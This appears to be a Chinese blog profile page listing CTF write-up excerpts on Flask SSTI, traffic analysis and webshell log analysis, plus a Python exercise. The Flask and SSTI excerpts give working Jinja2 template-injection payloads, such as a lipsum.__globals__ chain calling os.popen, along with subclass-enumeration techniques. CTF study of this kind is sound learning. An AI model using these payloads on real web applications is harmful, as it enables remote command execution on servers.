- 博客(10)
- 收藏
- 关注
原创 Python编程练习续
i = 1n = 1e = 1n *= ie += 1 / ni += 1print('e的值近似于', e):::warningpow(x, y)其中,x和y可以是任意实数或复数,x表示底数,y表示指数。pow()函数返回x的y次幂的结果。class Car:print('这辆汽车的品牌是{},颜色是{},产自{}.'.format(self.brand,self.color,self.made))mycar = Car('欧拉','粉色','中国')运行截图。
2024-04-25 09:32:47
559
3
原创 BUUCTF-[RootersCTF2019]I_<3_Flask
直接利用flask的一个方法:lipsum,在lipsum.__globals__含有os模块,利用方法:{{lipsum.__globals__['os'].popen('ls').read()}}name={{''.__class__.__base__.__subclasses__()[132].__init__}} #查看模块是否被加载。name={{%27%27.__class__.__base__.__subclasses__()}}#查看当前页面下,加载的子类。加载成功就可以利用了。
2023-07-17 15:21:09
232
1
原创 密码-流量分析
题目描述说已提取出上位机通信流量,尝试分析出异常点,获取FLAG。flag形式为 flag{},这其实就是一个暗示,flag就在通信流量中,至于哪里异常,查了资料,有的说UDP的长度有部分异常,要一个个点击查看。这引起了运维人员的注意,他在过滤出ICMP包分析并马上开始做应急处理很可能已被攻击的设备。flag形式为 flag{}现已提取出上位机通信流量,尝试分析出异常点,获取FLAG。其实在题目中已经暗示了flag就在异常流量中,直接搜索flag搜索不到,将flag转化为16进制,然后进行搜索。
2023-06-27 16:52:35
257
1
原创 青少年CTF-服务器日志
(形式:qsnctf{文件路径-密码-文件名-文件内容})提交。找到上传一句话木马后,查看的文件,以及文件内容。发现这里有一句话木马,文件,追踪TCP流。流量文件比较简单,log.pcap。
2023-04-16 17:12:26
281
1
原创 青少年CTF-SSTI
在获取初始化属性后,带wrapper的说明没有重载,寻找不带warpper的,因为wrapper是指这些函数并没有被重载,这时它们并不是function,不具有__globals__属性。python的object类中集成了很多的基础函数,我们想要调用的时候也是需要用object去操作的,主要是通过__mro__ 和 __bases__两种方式来创建。|attr()为jinja2原生函数,是一个过滤器,它只查找属性获取并返回对象的属性的值,过滤器与变量用管道符号( | )分割.%}1{% endif %}
2023-04-04 14:18:00
1211
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人